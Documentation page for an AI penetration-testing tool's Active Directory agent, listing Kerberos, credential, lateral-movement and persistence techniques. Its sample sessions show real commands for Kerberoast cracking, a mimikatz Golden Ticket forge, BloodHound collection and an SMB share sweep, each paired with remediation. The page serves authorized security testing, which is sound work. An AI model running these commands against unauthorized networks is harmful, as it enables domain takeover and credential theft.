Skip to main content

Cyberstrike is now open source! AI-powered penetration testing for security professionals. Star on GitHub

Internal Network Agent

The Internal Network agent is a specialized security testing agent equipped with comprehensive knowledge of Active Directory security, Kerberos protocol attacks, and network penetration testing methodologies.

Overview

The Internal Network agent combines deep Active Directory security knowledge with automated tooling to perform thorough network penetration testing. It’s pre-loaded with specialized skills for AD enumeration, Kerberos attacks, and lateral movement techniques.

Agent Configuration

PropertyValue
Agent IDinternal-network
ColorPurple
Pre-loaded Skillsad-security, kerberos-attacks, network-pentest, privilege-escalation
Allowed ToolsBash, Read, Glob, Grep, WebFetch, WebSearch, Memory

Launch the Agent

Terminal window
# Start Cyberstrike with internal network agent
cyberstrike --agent internal-network
# Or switch during session
/agent internal-network

Knowledge Base

The Internal Network agent has access to extensive security knowledge through the skills system.

Active Directory Security Skill

The agent is pre-loaded with comprehensive AD security knowledge including:

  • Domain enumeration techniques
  • Trust relationship mapping
  • Group Policy analysis
  • ACL abuse vectors
  • Delegation configuration review
  • Certificate Services (AD CS) attacks

Kerberos Attacks Skill

Complete Kerberos attack methodology including:

  • Kerberoasting (Service ticket extraction)
  • AS-REP Roasting (Pre-auth disabled accounts)
  • Golden Ticket attacks
  • Silver Ticket attacks
  • Diamond Ticket attacks
  • S4U abuse techniques
  • Constrained delegation exploitation
  • Resource-based constrained delegation (RBCD)

Network Pentest Skill

Comprehensive network penetration testing knowledge:

  • Host discovery and enumeration
  • Service identification
  • Vulnerability scanning
  • Exploitation techniques
  • Post-exploitation
  • Pivoting and tunneling

Active Directory Attack Vectors

The agent systematically tests AD attack vectors organized by category:

Credential Access (14 techniques)

Technique IDTechnique Name
AD-CRED-01LLMNR/NBT-NS Poisoning
AD-CRED-02Kerberoasting
AD-CRED-03AS-REP Roasting
AD-CRED-04Password Spraying
AD-CRED-05DCSync Attack
AD-CRED-06NTDS.dit Extraction
AD-CRED-07LSASS Memory Dumping
AD-CRED-08SAM Database Extraction
AD-CRED-09Cached Credentials Extraction
AD-CRED-10DPAPI Secrets Decryption
AD-CRED-11Group Policy Preferences
AD-CRED-12Kerberos Unconstrained Delegation
AD-CRED-13Shadow Credentials
AD-CRED-14Machine Account Quota Abuse

Danger

Credential extraction techniques require explicit authorization. These attacks can trigger security alerts and may violate laws if performed without permission.

Privilege Escalation (12 techniques)

Technique IDTechnique Name
AD-PRIV-01ACL Abuse (GenericAll, WriteDACL)
AD-PRIV-02Group Membership Abuse
AD-PRIV-03GPO Abuse
AD-PRIV-04AD CS ESC1-8 Attacks
AD-PRIV-05Constrained Delegation Abuse
AD-PRIV-06Resource-Based Constrained Delegation
AD-PRIV-07SeImpersonate/SeAssignPrimaryToken
AD-PRIV-08DNSAdmin Abuse
AD-PRIV-09Exchange Abuse
AD-PRIV-10SCCM/MECM Abuse
AD-PRIV-11LAPS Password Retrieval
AD-PRIV-12gMSA Password Retrieval

Lateral Movement (10 techniques)

Technique IDTechnique Name
AD-LAT-01Pass-the-Hash (PtH)
AD-LAT-02Pass-the-Ticket (PtT)
AD-LAT-03Overpass-the-Hash
AD-LAT-04PSExec/SMBExec
AD-LAT-05WMI Execution
AD-LAT-06WinRM/PowerShell Remoting
AD-LAT-07DCOM Execution
AD-LAT-08RDP Hijacking
AD-LAT-09SSH Pivoting
AD-LAT-10SOCKS Proxy Tunneling

Persistence (8 techniques)

Technique IDTechnique Name
AD-PERS-01Golden Ticket
AD-PERS-02Silver Ticket
AD-PERS-03Diamond Ticket
AD-PERS-04Skeleton Key
AD-PERS-05AdminSDHolder Modification
AD-PERS-06SID History Injection
AD-PERS-07DSRM Account Abuse
AD-PERS-08DCShadow Attack

AD CS (Certificate Services) Attack Coverage

The agent includes complete coverage of AD CS attacks (ESC1-ESC11):

Attack IDAttack NameDescription
ESC1Misconfigured Certificate TemplatesENROLLEE_SUPPLIES_SUBJECT enabled
ESC2Misconfigured Certificate TemplatesAny Purpose EKU or no EKU
ESC3Misconfigured Enrollment Agent TemplatesEnrollment agent + vulnerable template
ESC4Vulnerable Certificate Template ACLAttacker can modify template
ESC5Vulnerable PKI AD Object ACLAttacker can modify CA config
ESC6EDITF_ATTRIBUTESUBJECTALTNAME2CA configured with SAN flag
ESC7Vulnerable CA ACLManageCA or ManageCertificates
ESC8NTLM Relay to AD CS HTTP EndpointsWeb enrollment without EPA
ESC9No Security ExtensionCT_FLAG_NO_SECURITY_EXTENSION
ESC10Weak Certificate MappingsCertificate mapping issues
ESC11NTLM Relay to ICPRRPC certificate enrollment

Tip

Use Certipy or Certify to enumerate AD CS misconfigurations before exploitation.

Kerberos Attack Methodology

Kerberoasting

> Perform Kerberoasting attack against the domain
[Enumerating SPNs...]
Found 23 service accounts with SPNs
[Requesting service tickets...]
[email protected] - AES256-CTS-HMAC-SHA1-96
[email protected] - AES256-CTS-HMAC-SHA1-96
[Cracking tickets with hashcat...]
hashcat -m 13100 hashes.txt wordlist.txt
FINDING: Kerberoastable Service Account
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Technique: AD-CRED-02
SPN: MSSQLSvc/sql01.corp.local:1433
Encryption: RC4-HMAC (weak)
Severity: High (CVSS 7.5)
Evidence: Password cracked in 2 minutes
CWE: CWE-521
Remediation:
- Use AES256 encryption for service accounts
- Use long, complex passwords (25+ chars)
- Consider Group Managed Service Accounts (gMSA)

AS-REP Roasting

> Find and exploit accounts with pre-auth disabled
[Querying LDAP for DONT_REQUIRE_PREAUTH...]
Found 5 accounts with pre-authentication disabled
[Requesting AS-REP tickets...]
[email protected] - Ticket obtained
[email protected] - Ticket obtained
FINDING: AS-REP Roastable Account
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Technique: AD-CRED-03
User Account Control: DONT_REQUIRE_PREAUTH
Severity: High (CVSS 7.5)
Evidence: AS-REP hash extractable without auth
CWE: CWE-287
Remediation:
- Enable Kerberos pre-authentication
- Audit accounts with this flag disabled

Golden Ticket Attack

> Demonstrate Golden Ticket persistence
[Prerequisites...]
✓ Domain SID: S-1-5-21-3623811015-3361044348-30300820
✓ krbtgt NTLM hash: aad3b435b51404eeaad3b435b51404ee:8846f7...
[Forging Golden Ticket...]
mimikatz # kerberos::golden /user:Administrator /domain:corp.local
/sid:S-1-5-21-3623811015-3361044348-30300820
/krbtgt:8846f7... /ptt
FINDING: Golden Ticket Attack Possible
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Technique: AD-PERS-01
Impact: Complete domain compromise
Persistence: 10 years (default ticket lifetime)
Severity: Critical (CVSS 10.0)
Evidence: Forged TGT accepted by KDC
CWE: CWE-287
Remediation:
- Reset krbtgt password twice
- Implement Credential Guard
- Monitor for TGT anomalies

Testing Methodology

The agent follows a structured approach:

┌─────────────────────────────────────────────────────────────┐
│ TESTING METHODOLOGY │
├─────────────────────────────────────────────────────────────┤
│ 1. RECONNAISSANCE │
│ └── Network scanning, domain enumeration │
│ │
│ 2. ENUMERATION │
│ └── Users, groups, ACLs, trusts, policies │
│ │
│ 3. VULNERABILITY IDENTIFICATION │
│ └── Misconfigurations, weak permissions, CVEs │
│ │
│ 4. EXPLOITATION │
│ └── Credential access, privilege escalation │
│ │
│ 5. LATERAL MOVEMENT │
│ └── Pivoting, persistence, domain dominance │
│ │
│ 6. REPORTING │
│ └── Attack paths, findings, remediation │
└─────────────────────────────────────────────────────────────┘

Integrated Security Tools

The agent leverages industry-standard penetration testing tools:

ToolPurpose
BloodHoundAttack path visualization and analysis
NetExec (nxc)Network service enumeration and exploitation
ImpacketPython AD attack toolkit
CertipyAD CS enumeration and exploitation
RubeusKerberos attack toolkit
MimikatzCredential extraction and manipulation
ResponderLLMNR/NBT-NS poisoning

Tool Integration Example

> Run BloodHound collection against the domain
[Executing BloodHound collector...]
bloodhound-python -c All -d corp.local -u jsmith -p 'Password123' -ns 10.0.0.1
[Collection complete]
Users: 2,847
Computers: 156
Groups: 423
GPOs: 89
OUs: 34
Domains: 1
Trusts: 2
[Analyzing attack paths...]
Shortest path to Domain Admin: 3 hops
→ MemberOf → IT-Support
→ GenericAll → [email protected]
→ AdminTo → DC01.corp.local

NetExec (CrackMapExec Successor) Example

> Enumerate SMB shares across the network
[Executing NetExec...]
nxc smb 10.0.0.0/24 -u jsmith -p 'Password123' --shares
[Results]
10.0.0.10 445 DC01 [*] Windows Server 2019 (name:DC01) (domain:corp.local)
10.0.0.10 445 DC01 [+] corp.local\jsmith:Password123
10.0.0.10 445 DC01 SYSVOL READ
10.0.0.10 445 DC01 NETLOGON READ
10.0.0.10 445 DC01 IT-Share READ,WRITE
10.0.0.10 445 DC01 HR-Data NO ACCESS
FINDING: Sensitive Share Access
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Host: DC01 (10.0.0.10)
Share: IT-Share
Access: READ,WRITE
User: jsmith (non-privileged)
Severity: Medium (CVSS 5.3)
Evidence: Standard user has write access to IT share
CWE: CWE-732
Remediation:
- Review share permissions
- Implement least privilege
- Enable share auditing

CVSS Severity Rating

The agent rates findings using CVSS 3.1:

SeverityCVSS ScoreExample Findings
Critical9.0 - 10.0DCSync possible, Golden Ticket, AD CS ESC1
High7.0 - 8.9Kerberoasting (weak), GenericAll on DA
Medium4.0 - 6.9Password spraying, SMB share access
Low0.1 - 3.9Information disclosure, null sessions

Session Example

You: Perform Active Directory security assessment against corp.local
Agent: I'll perform a comprehensive AD security assessment following structured methodology.
## Phase 1: Domain Enumeration
[Connecting to domain controller...]
Domain: corp.local
Domain Controller: DC01.corp.local (10.0.0.10)
Forest Functional Level: Windows Server 2016
[Enumerating domain objects...]
Users: 2,847
Computers: 156
Groups: 423
Trust Relationships: 2 (bidirectional to partner.local)
## Phase 2: Credential Access Testing
[Testing AD-CRED-02: Kerberoasting...]
⚠ FINDING - 8 accounts with crackable service tickets
FINDING: Kerberoastable Service Accounts
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Technique: AD-CRED-02
Affected Accounts:
- svc_sql (RC4, Password: Summer2023!)
- svc_backup (RC4, cracking in progress)
- svc_iis (AES256, strong password)
Severity: High (CVSS 7.5)
CWE: CWE-521
## Phase 3: Privilege Escalation Analysis
[Testing AD-PRIV-01: ACL Abuse...]
⚠ FINDING - Attack path to Domain Admin identified
FINDING: ACL Abuse Path to Domain Admin
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Technique: AD-PRIV-01
Path:
1. jsmith → MemberOf → Help Desk
2. Help Desk → GenericAll → IT-Admins group
3. IT-Admins → WriteDACL → Domain Admins
Severity: Critical (CVSS 9.8)
Evidence: BloodHound path verified
CWE: CWE-269
[Testing AD-PRIV-04: AD CS Attacks...]
⚠ FINDING - ESC1 vulnerable template found
FINDING: AD CS ESC1 - Vulnerable Certificate Template
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Technique: AD-PRIV-04
Template: UserAuthentication
Issue: ENROLLEE_SUPPLIES_SUBJECT enabled
Enrollment: Domain Users can enroll
Severity: Critical (CVSS 9.8)
Evidence: Can request cert as Domain Admin
CWE: CWE-295
Remediation:
- Disable ENROLLEE_SUPPLIES_SUBJECT
- Require CA certificate manager approval
- Audit certificate template permissions
[Continuing with remaining assessment phases...]

Attack Path Visualization

The agent generates attack path diagrams:

┌─────────────────────────────────────────────────────────────┐
│ ATTACK PATH ANALYSIS │
├─────────────────────────────────────────────────────────────┤
│ │
│ [Initial Access] │
│ │ │
│ ▼ │
│ ┌─────────┐ Kerberoast ┌─────────────┐ │
│ │ jsmith │ ───────────────► │ svc_sql │ │
│ └─────────┘ └──────┬──────┘ │
│ │ │
│ LocalAdmin │
│ │ │
│ ▼ │
│ ┌─────────────┐ │
│ │ SQL01 │ │
│ └──────┬──────┘ │
│ │ │
│ DCSync (mimikatz) │
│ │ │
│ ▼ │
│ ┌─────────────┐ │
│ │ DC01 │ │
│ │ (Domain │ │
│ │ Admin) │ │
│ └─────────────┘ │
│ │
│ Hops: 3 | Likelihood: HIGH | Impact: CRITICAL │
└─────────────────────────────────────────────────────────────┘

Best Practices

  1. Rules of Engagement - Document scope, timing, and allowed techniques
  2. Communication - Maintain contact with client during testing
  3. Evidence Collection - Screenshot and log all findings
  4. Clean Up - Remove tools, tickets, and artifacts after testing
  5. Safe Testing - Avoid production system disruption

Caution

Network penetration testing requires explicit written authorization. Unauthorized testing is illegal and can cause significant damage to production systems.